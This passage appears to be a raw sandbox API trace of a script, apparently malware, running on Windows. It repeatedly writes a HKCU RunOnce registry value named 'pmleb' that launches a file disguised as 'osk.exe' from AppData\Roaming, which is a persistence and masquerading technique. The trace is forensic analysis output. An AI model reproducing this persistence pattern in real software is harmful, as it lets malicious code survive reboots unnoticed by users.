This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.520] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.520] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.520] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.520] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.520] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x40 [0079.520] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.520] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x41 [0079.520] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.521] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x40 [0079.521] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.521] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.521] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.521] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.521] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.521] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.521] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.521] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.521] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.522] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.522] RegCloseKey (hKey=0x280) returned 0x0 [0079.522] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.522] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.522] SetTimer (hWnd=0x20280, nIDEvent=0x2040, uElapse=0xa, lpTimerFunc=0x0) returned 0x2040 [0079.522] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.535] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.535] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.535] KillTimer (hWnd=0x20280, uIDEvent=0x2040) returned 1 [0079.535] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.535] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.535] IUnknown:Release (This=0x787518) returned 0x1 [0079.535] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.535] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.536] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.536] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.536] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.536] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.536] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.536] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.536] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.536] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x41 [0079.536] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.536] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x42 [0079.536] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.537] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x41 [0079.537] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.537] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.537] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.537] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.537] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.537] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.537] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.537] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.537] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.538] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.538] RegCloseKey (hKey=0x280) returned 0x0 [0079.538] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.538] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.538] SetTimer (hWnd=0x20280, nIDEvent=0x2041, uElapse=0xa, lpTimerFunc=0x0) returned 0x2041 [0079.538] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.558] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.558] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.558] KillTimer (hWnd=0x20280, uIDEvent=0x2041) returned 1 [0079.558] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.558] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.559] IUnknown:Release (This=0x787518) returned 0x1 [0079.559] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.559] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.559] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.559] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.559] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x42 [0079.559] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.559] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x43 [0079.559] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.560] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x42 [0079.560] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.560] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.560] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.560] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.560] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.560] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.561] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.561] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.561] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.561] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.561] RegCloseKey (hKey=0x280) returned 0x0 [0079.561] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.561] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.561] SetTimer (hWnd=0x20280, nIDEvent=0x2042, uElapse=0xa, lpTimerFunc=0x0) returned 0x2042 [0079.561] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.565] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.565] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.566] KillTimer (hWnd=0x20280, uIDEvent=0x2042) returned 1 [0079.566] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.566] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.566] IUnknown:Release (This=0x787518) returned 0x1 [0079.566] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.566] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.566] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, 